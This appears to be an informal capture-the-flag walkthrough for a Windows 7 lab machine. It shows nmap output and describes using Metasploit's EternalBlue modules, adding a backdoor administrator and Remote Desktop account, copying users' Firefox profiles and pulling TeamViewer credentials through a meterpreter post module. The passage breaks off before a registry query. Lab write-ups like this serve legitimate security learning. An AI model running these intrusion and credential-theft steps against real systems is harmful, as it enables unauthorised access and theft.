So lets start first with the nmap scan :

Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-07-02 09:44 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.25% done; ETC: 09:47 (0:02:38 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.89% done; ETC: 09:45 (0:01:18 remaining)
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 45.45% done; ETC: 09:46 (0:00:32 remaining)
Nmap scan report for 10.10.151.223
Host is up (0.047s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
|_ssl-date: 2020-06-09T12:16:34+00:00; +2s from scanner time.
5357/tcp  open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
9001/tcp  open  tcpwrapped         syn-ack
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
49155/tcp open  msrpc              syn-ack Microsoft Windows RPC
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC
49160/tcp open  msrpc              syn-ack Microsoft Windows RPC

So we can see its a Windows machine and has a SMB port open so why not look if its vulnerable to Eternal Blue lets load up msfconsole and search eternal blue and pick an auxilarly module which checks and voila we are in luck here that the machine is vulnerable So lets try a eternal blue exploit module i nromally use psexec one but didnt work this time . So i tried another one and it worked lets try and see try looking at users and which groups people are in we can do that by typing :

net users

To see all the available users on the machine which are Zachary and Timmy . Now let's find out some more stuff about the users and run net user Zachary. From the output we can see this user is in the Administrators group. So let's do the same for Timmy .

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/f22f5c73-0463-468b-8798-a373fd03ec0c/Untitled.png

sooo we can try changing the passwords of these users or also get passwords for these users but lets just add a user which contains all the privelleges like Administrator and Remote Desktop User .

by doing :

net user nickapic password /add
net localgroup "Adminitrator" nickapic /add
net localgroup "Remote Desktop Users" nickapic /add

Now we can use the newly made account to RDP into the machine and check all the files and stuff we need.

xfreerdp /u:nickapic /p:password /v:<ip>

and in here we have documents in where we can find all the flags and everything we need and also to find Firefox history and stuff for each user. We have to copy there AppData/Roaming/Firefox folder to our AppData/Roaming/Firefox and then lets just see what they were doing and get all the flags.

Technique 2 :

First lets upgrade our shell to Meterpreter by using this module : post-explotacion shell_to_meterpreter.

Then we can use this module to gather credentials by using this CVE TeamViewer - CVE-2019-18988 and in our meterpreter shell we can just write run post/windows/gather/credentials/teamviewer_passwords

and it will give us Teamviewer credentials

For some reason if our password is not shown complete with the metasploit module, it can be done manually, by querying the registry: